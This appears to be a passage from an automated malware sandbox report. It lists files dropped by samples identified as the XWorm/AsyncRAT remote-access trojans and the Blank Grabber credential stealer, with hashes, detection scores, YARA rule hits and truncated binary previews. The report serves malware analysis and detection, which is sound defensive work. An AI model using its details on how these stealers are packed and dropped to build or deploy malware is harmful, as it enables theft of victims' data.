SSDEEP:	192:konexQO0FoAWyEfJkVIaqaLHmr/XKT0ifnTJ1jvVXctNjA:HnexHAWyEfJoIaqayzKAifd1LVEj
MD5:	6557BD5240397F026E675AFB78544A26
SHA1:	839E683BF68703D373B6EAC246F19386BB181713
SHA-256:	A7FECFC225DFDD4E14DCD4D1B4BA1B9F8E4D1984F1CDD8CDA3A9987E5D53C239
SHA-512:	F2399D34898A4C0C201372D2DD084EE66A66A1C3EAE949E568421FE7EDADA697468EF81F4FCAB2AFD61EAF97BCB98D6ADE2D97295E2F674E93116D142E892E97
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 33%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)............"...0.............I... ...`....@.. ....................................`.................................?I..O....`...............................H..8............................................ ............... ..H............text....)... ..................... ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B................sI......H........'... ...........................................................0..;........r...p.(....(...............(...+}......~.......(......9...............(...+}.......}.......6}.......}...... ....}........0..{....+..}......~.......(...........,'.(......r'..p..(....(....(.......s....z..........(...+}.......~.......(....&......%.......%.......%..........+'.(......r=..p..(....(....(.......s....z..6..(.............0...........(....o......rS..p(.........+8...........o..........

C:\Users\user\AppData\Local\Temp\XClient.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\S l r .exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	54784
Entropy (8bit):	5.865893416493186
Encrypted:	false
SSDEEP:	1536:ABCSePghTBz+uO9S+bUwga3HX6l+OZ1aSC:Acgh1zF+bUiHlOZ1lC
MD5:	BF19D4A22F47EEA6DD1DB1C98A5AAC07
SHA1:	384506BF1E83DF03D48CDC59E7EFB03D8087D3C5
SHA-256:	A7F98D3361874AC82332FBB9CDED7BE12EF8CB6699305351E27247A2B464272C
SHA-512:	C8C6FAB16E60FAB5BEB5B209C8FB5446D7E9B46E40EB575D0D8004A634578831DDE56C257B6621E4382C9AB674FDEC005F903DF84A4A4E7A32A952ACE92980AE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H.f............................>.... ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................ .......H.......<`..........&.....................................................(.....r...p. ~.H...(.....ro..p. .O...s.........s.........s.........s..........r...p. h.:..r...p. .x!..r...p. ..[..r...p. ..?..r...p. &.....((....r...p. .s...r7..p"(....+.&(....&+..+5sZ... .... .'..o[...(,...~....-.(G...(9...~....o\...&.-..r...p. S....r9..p.rW..p. .(T..ru..p. .._..r...p.r...p. .0................j..................s]..............~........."(I...+.:.t..

C:\Users\user\AppData\Local\Temp\_MEI64962\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	109392
Entropy (8bit):	6.641929675972235
Encrypted:	false
SSDEEP:	1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
MD5:	4585A96CC4EEF6AAFD5E27EA09147DC6
SHA1:	489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
SHA-256:	A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
SHA-512:	D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI64962\_bz2.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49424
Entropy (8bit):	7.810943555944167
Encrypted:	false
SSDEEP:	1536:MtiGgF1TxbYecfs2F876zpfImCVQj7SysPxJ:MkHz4LFPNImCVQjGxJ
MD5:	554B7B0D0DACA993E22B7D31ED498BC2
SHA1:	EA7F1823E782D08A99B437C665D86FA734FE3FE4
SHA-256:	1DB14A217C5279C106B9D55F440CCF19F35EF3A580188353B734E3E39099B13F
SHA-512:	4B36097EDDD2C1D69AC98C7E98EEBE7BB11A5117249AD36A99883732F643E21ECF58E6BEA33B70974D600563DC0B0A30BEAD98BAFB72537F8374B3D67979E60A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{...............b`.....f......f......f......f......f......0f......b.............0f......0f......0f......0f......Rich............PE..d...0.,d.........." ..."............pd....................................................`.............................................H.................... .. ..................................................pp..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI64962\_ctypes.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59672
Entropy (8bit):	7.831609372582124
Encrypted:	false
SSDEEP:	1536:/UOlRJUIp/i+OnIlnGgm5XVz4iImLPAf7SyNlPx:MOpnomlnGgoXVUiImLPAfPZx
MD5:	D603C8BFE4CFC71FE5134D64BE2E929B
SHA1:	FF27EA58F4F5B11B7EAA1C8884EAC658E2E9248B
SHA-256:	5EE40BCAAB13FA9CF064ECAE6FC0DA6D236120C06FA41602893F1010EFAA52FE
SHA-512:	FCC0DBFBE402300AE47E1CB2469D1F733A910D573328FE7990D69625E933988ECC21AB22F432945A78995129885F4A9392E1CEE224D14E940338046F61ABE361
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........G..&...&...&...^...&...Z...&...Z...&...Z...&...Z...&..eZ...&...^...&...^...&..cZ...&...&..W&..eZ...&..eZ...&..eZv..&..eZ...&..Rich.&..........PE..d...(.,d.........." ...".........`.......p...................................0............`.........................................H,.......)....... .......................,..........................................@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI64962\_decimal.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	109328
Entropy (8bit):	7.929780506017125
Encrypted:	false
SSDEEP:	3072:CNb2HcDjyP1iSYsEHOqLQb1H7wtDWPnyTm2GN4ImOqGCArxv:CNb2HeyiOrH0t6r2kC8
MD5:	9CEF71BE6A40BC2387C383C217D158C7
SHA1:	DD6BC79D69FC26E003D23B4E683E3FAC21BC29CB
SHA-256:	677D9993BB887FEF60F6657DE6C239086ACE7725C68853E7636E2FF4A8F0D009
SHA-512:	90E02054163D44D12C603DEBDC4213C5A862F609617D78DD29F7FD21A0BAE82ADD4CEAF30024DA681C2A65D08A8142C83EB81D8294F1284EDFBEEB7D66C371C8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........xR....................................................s.................../...s.......s.......s.......s.......s.......Rich....................PE..d.....,d.........." ...".p..........@........................................0............`..........................................,..P....)....... ..........@&...........-......................................@...@...........................................UPX0....................................UPX1.....p.......j..................@....rsrc........ .......n..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI64962\_hashlib.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36120
Entropy (8bit):	7.687203369989006
Encrypted:	false
SSDEEP:	768:a91cXZ8iY8JshuVLX7lB6IKpp5rbImOIta5YiSyvCKPxWE9:ajSYZhuN3QlrbImOIt47Sy7Px
MD5:	32DF18692606CE984614C7EFDA2EEC27
SHA1:	86084E39AB0AADF0ECFB82CE066B7BF14152961E
SHA-256:	B7C9C540D54AB59C16936E1639C6565CD35A8CA625F31753E57DB9CBD0EE0065
SHA-512:	679F8956370EDC4DEE32475D8440A2D2F9B6DD0EDD0E033E49FED7834A35C7ED51CCDE0995D19ED0A559A4383B99AE8C11E4E686902DB12A2A5E0A3F2C0F4A9D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g....2..g.......g.......g.......g.......g..9....g.......g..?....g...g..yg..9....g..9....g..9.^..g..9....g..Rich.g..................PE..d...?.,d.........." ...".P..........P .......................................@............`..........................................;..P....9.......0..........,............;......................................P,..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI64962\_lzma.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	87832
Entropy (8bit):	7.917975000328177
Encrypted:	false
SSDEEP:	1536:TwZh3A5zFTPuztVVQW1AyOXEyvYsnHUZK+K+k6Vvt7v/8ImZ1Lw7SyYAPxx3:kvA5utzWfXE0V0ZK+K+Jt7vUImZ1Lwtx
MD5:	01629284F906C40F480E80104158F31A
SHA1:	6AB85C66956856710F32AED6CDAE64A60AEA5F0F
SHA-256:	A201EC286B0233644AE62C6E418588243A3F2A0C5A6F556E0D68B3C747020812
SHA-512:	107A4E857DD78DD92BE32911E3A574F861F3425E01AB4B1A7580AC799DC76122CE3165465D24C34AC7FC8F2810547AD72B4D4BA3DE76D3D61ED9BF5B92E7F7D4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3.*{w.D(w.D(w.D(~..(s.D(8.E)u.D(8.A){.D(8.@)..D(8.G)t.D(..E)t.D(<.E)u.D(w.E(..D(..I)M.D(..D)v.D(..(v.D(..F)v.D(Richw.D(........PE..d...Q.,d.........." ...". ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI64962\_queue.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26392
Entropy (8bit):	7.482156836734595
Encrypted:	false
SSDEEP:	384:w0Psz9rLZgNhzHjlryUOy7s6Wp6hZa7gJXT7ImQUtNkHQIYiSy1pCQjtAPxh8E9s:GihFWRupD7ImQUtc5YiSyvxAPxWE9HJ
MD5:	4A313DC23F9D0A1F328C74DD5CF3B9AB
SHA1:	494F1F5EAD41D41D324C82721AB7CA1D1B72C062
SHA-256:	2163010BFDE88A6CC15380516D31955935E243B7AD43558A89380BF5FE86337E
SHA-512:	42C712B758B35C0005B3528AF586233298C2DF4ED9F5133B8469BCA9EC421AB151CE63F3929898C73D616CD9707594FA5F96D623FC150E214A4B2276C23C296E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_X..1...1...1.......1..0...1..4...1..5...1..2...1.a.0...1..0...1...0...1.a.<...1.a.1...1.a.....1.a.3...1.Rich..1.........PE..d...$.,d.........." ...".0................................................................`.............................................L.......P............`..............<...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI64962\_socket.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	44304
Entropy (8bit):	7.71997057538651
Encrypted:	false
SSDEEP:	768:EhFQ8MABQICFr2Tg+z2uPxYEV/WJqOxU/XNqppz7ImLwQFC5YiSyvLPxWE9dK:gTiFtipt/ML4NIz7ImLwQFg7SyTPxJK
MD5:	67897F8C3262AECB8C9F15292DD1E1F0
SHA1:	74F1EF77DD3265846A504F98F2E2F080EADBF58A
SHA-256:	DDBFA852E32E20D67A0C3D718CE68E9403C858D5CAD44EA6404AFF302556ABA7
SHA-512:	200B6570DB2FBB2EAC7F51CAE8E16FFB89CD46D13FBA94A7729A675F10F4432FC89A256FD6BD804FEAC528191BD116407FD58A0573487D905FC8FCA022C1ABBA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NXY..97..97..97..A...97.EE6..97.EE2..97.EE3..97.EE4..97..E6..97..96..97.AA6..97..E:..97..E7..97..E...97..E5..97.Rich.97.................PE..d...M.,d.........." ...".p...........m....................................................`.............................................P.......h............ ..x...........X........................................y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI64962\_sqlite3.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	57616
Entropy (8bit):	7.835326928436035
Encrypted:	false
SSDEEP:	1536:F1OB9LTyHEhkBFl837aWkbKlujFImOQAO7SyuWPxJ:i/LTyHRTU1kuluZImOQAOfxJ
MD5:	230025CF18B0C20C5F4ABBA63D733CA8
SHA1:	336248FDE1973410A0746599E14485D068771E30
SHA-256:	30A3BC9ED8F36E3065B583D56503B81297F32B4744BFF72DCF918407978CE332
SHA-512:	2C4D943C6587D28763CF7C21AD37CC4762674A75C643994B3E8E7C7B20576D5674CF700FDFADDC1A834D9BF034BF2F449D95351C236FDE720505CCDD03369BB1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................n......................................................................................Rich...................PE..d...Q.,d.........." ...".........`..@....p...................................0............`..........................................+..P....)....... .......................+..$...................................@...@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI64962\_ssl.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	63768
Entropy (8bit):	7.854684407863412
Encrypted:	false
SSDEEP:	1536:xzB+lCu0pTB1zYk0UdJSqtEZImC7b0E7SyZfPx:9cCu0pHzD0UFtWImC7bXbnx
MD5:	0D15B2FDFA03BE76917723686E77823C
SHA1:	EFD799A4A5E4F9D15226584DD2EE03956F37BDAF
SHA-256:	2FC63ABE576C0D5FE031CF7EE0E2F11D9C510C6DBACFC5DD2E79E23DA3650EE8
SHA-512:	E21AB5EBE8B97243CF32CA9181C311978E203852847E4BEB5E6ADA487038C37DEC18A2B683E11E420E05ACE014ACA2172B2DDA15930BAB944053843E25623227
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........i...i...i.......i..h...i..l...i..m...i..j...i.o.h...i.i.h...i...h.'.i..h...i.o.d...i.o.i...i.o.....i.o.k...i.Rich..i.........................PE..d...R.,d.........." ..."............`.....................................................`.........................................p...d....................P......................................................p...@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI64962\base_library.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1437065
Entropy (8bit):	5.59096386645216
Encrypted:	false
SSDEEP:	24576:mQR5pATt7xm4lUKdcubgAnyfb3s0iwhBdYf9P3sGHHO:mQR5pQxmzG8
MD5:	5011D68FBEA0156FE813D00C1F7D9AF2
SHA1:	D76D817CAC04D830707CE97B4D0D582A988E1DBD
SHA-256:	B9E9569931047CD6A455EC826791C2E6C249C814DC0FA71F0BD7FA7F49B8948D
SHA-512:	6A5AFFDE07B5150B5AEE854851F9F68C727B0F5BA83513C294D27461546A5EF67BF6C5869FC4ABDADAA9BF1767EA897910C640C5494B659A29004050C9C5D099
Malicious:	false
Preview:	PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

C:\Users\user\AppData\Local\Temp\_MEI64962\blank.aes

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	124608
Entropy (8bit):	7.65391351140966
Encrypted:	false
SSDEEP:	3072:GycgEfVuWi+vsR0Yt+eOapFM5EzrU9qyYOClC3il5sveaU6G:GycFN7i+vsR0Y+a/M5EYzY7SiIU6G
MD5:	2C4CC5F2130D32BE2F863A2D33FD762D
SHA1:	4BF5AA1038881465EA548683DCAB0E3F0E85A0D3
SHA-256:	250C9B247E0CFD68D8B76C998320CB085BB339E8016C7D7F187931E20E1C4692
SHA-512:	329E35F438629F49A413FCCCA1041DCF47FD4DCFBCEA07483C43EFF50234D4C5E7CDA00E115B8453F0C560935E85AD2649BF572F606721ED7521288E29E49FFF
Malicious:	false
Preview:	PK........Y..XXw~.J...J.......stub-o.pyc.........R.f.Q........................j.......e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.................................................................

C:\Users\user\AppData\Local\Temp\_MEI64962\libcrypto-1_1.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1112856
Entropy (8bit):	7.937513332106868
Encrypted:	false
SSDEEP:	24576:AfVpBeOErQiWG03fz7UuJ7G/y1Pcg8rWgrnNFF+EoIFAVMBU1CPwDv3uFfJN:4pBejNWGoXFJ7ay14rWgrnNxoIFAy+1Y
MD5:	BBC1FCB5792F226C82E3E958948CB3C3
SHA1:	4D25857BCF0651D90725D4FB8DB03CCADA6540C3
SHA-256:	9A36E09F111687E6B450937BB9C8AEDE7C37D598B1CCCC1293EED2342D11CF47
SHA-512:	3137BE91F3393DF2D56A3255281DB7D4A4DCCD6850EEB4F0DF69D4C8DDA625B85D5634FCE49B195F3CC431E2245B8E9BA401BAAA08778A467639EE4C1CC23D8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..........&..n5...&...................................7...........`......................................... .5.......5.h.....5.......2...............7......................................z5.@...........................................UPX0......&.............................UPX1..........&.....................@....rsrc.........5.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI64962\libffi-8.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29968
Entropy (8bit):	7.677818197322094
Encrypted:	false
SSDEEP:	768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:	08B000C3D990BC018FCB91A1E175E06E
SHA1:	BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:	135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:	8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI64962\libssl-1_1.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	209688
Entropy (8bit):	7.925861479415686
Encrypted:	false
SSDEEP:	3072:He9fHP8SzrOGFIXkUNNlvBK8Tg111WMEGf0+fGYahm8YNIqepRLvwdlMrQk/OlfJ:+99u/XRxpK8M111nEE0iGYziqGdvwLeO
MD5:	AD0A2B4286A43A0EF05F452667E656DB
SHA1:	A8835CA75768B5756AA2445CA33B16E18CEACB77
SHA-256:	2AF3D965863018C66C2A9A2D66072FE3657BBD0B900473B9BBDCAC8091686AE1
SHA-512:	CCEB5EC1DD6D2801ABBACD6112393FECBF5D88FE52DB86CFC98F13326C3D3E31C042B0CC180B640D0F33681BDD9E6A355DC0FBFDE597A323C8D9E88DE40B37C4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1}q.1}q.1}q.8..=}q.~.p.3}q.z.p.3}q.~.t.=}q.~.u.9}q.~.r.5}q...p.2}q.1}p..\|q...u..}q...q.0}q.....0}q...s.0}q.Rich1}q.........PE..d......c.........." ...".....P...`.......p................................................`..........................................6..4@...3.......0...........N...........v.......................................&..@...........................................UPX0.....`..............................UPX1.........p......................@....rsrc....P...0...H..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI64962\python311.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1703184
Entropy (8bit):	7.993705819120503
Encrypted:	true
SSDEEP:	49152:+kJce+tFLwBxJ01hS41mhwuxtH59x/xWI:Xce+tA0D/1HuLZpt
MD5:	9E985651962CCBCCDF5220F6617B444F
SHA1:	9238853FE1CFF8A49C2C801644D6AA57ED1FE4D2
SHA-256:	3373EE171DB8898C83711EC5067895426421C44F1BE29AF96EFE00C48555472E
SHA-512:	8B8E68BBE71DCD928DBE380FE1A839538E7B8747733BA2FD3D421BA8D280A11BA111B7E8322C14214D5986AF9C52AB0C75288BBB2A8B55612FB45836C56DDC36
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D........+........./.........)..........+....+...(.'.)..(....(.....(.(...Rich.*.........PE..d.....,d.........." ..."..........D...]...D...................................^...........`.........................................H.].......].......].......V.40...........^.......................................].@...........................................UPX0......D.............................UPX1..........D.....................@....rsrc.........].....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI64962\rar.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	630736
Entropy (8bit):	6.409476333013752
Encrypted:	false
SSDEEP:	12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:	9C223575AE5B9544BC3D69AC6364F75E
SHA1:	8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:	57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI64962\rarreg.key

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	456
Entropy (8bit):	4.447296373872587
Encrypted:	false
SSDEEP:	12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:	4531984CAD7DACF24C086830068C4ABE
SHA1:	FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:	58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:	00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI64962\rarreg.key, Author: Joe Security
Preview:	RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

C:\Users\user\AppData\Local\Temp\_MEI64962\select.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\Built.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26384
Entropy (8bit):	7.436534513949536
Encrypted:	false
SSDEEP:	768:yjW1JNYpJjdImQGtq5YiSyvaAPxWE9Uux:yjW1XCjdImQGto7SyFPxBx
MD5:	27703F9A7C7E90E049D5542FB7746988
SHA1:	BC9C6F5271DEF4CC4E9436EFA00F231707C01A55
SHA-256:	FCC744CFCCC1C47F6F918E66CFC1B73370D2CECDB776984FABB638745EBE3A38
SHA-512:	0875AD48842BBAC73E59D4B0B5D7083280BDE98336C8856160493CC63F7C3A419F4471F19C8537E5C8515E194C6604F9EFA07D9D9AF5DEF2F374406D316436A8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r..t6.t'6.t'6.t'?..'4.t'y.u&4.t'y.q&:.t'y.p&>.t'y.w&2.t'.u&4.t'6.u't.t'}.u&3.t'.y&7.t'.t&7.t'.'7.t'.v&7.t'Rich6.t'........PE..d...$.,d.........." ...".0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI64962\sqlite3.dll

Download File

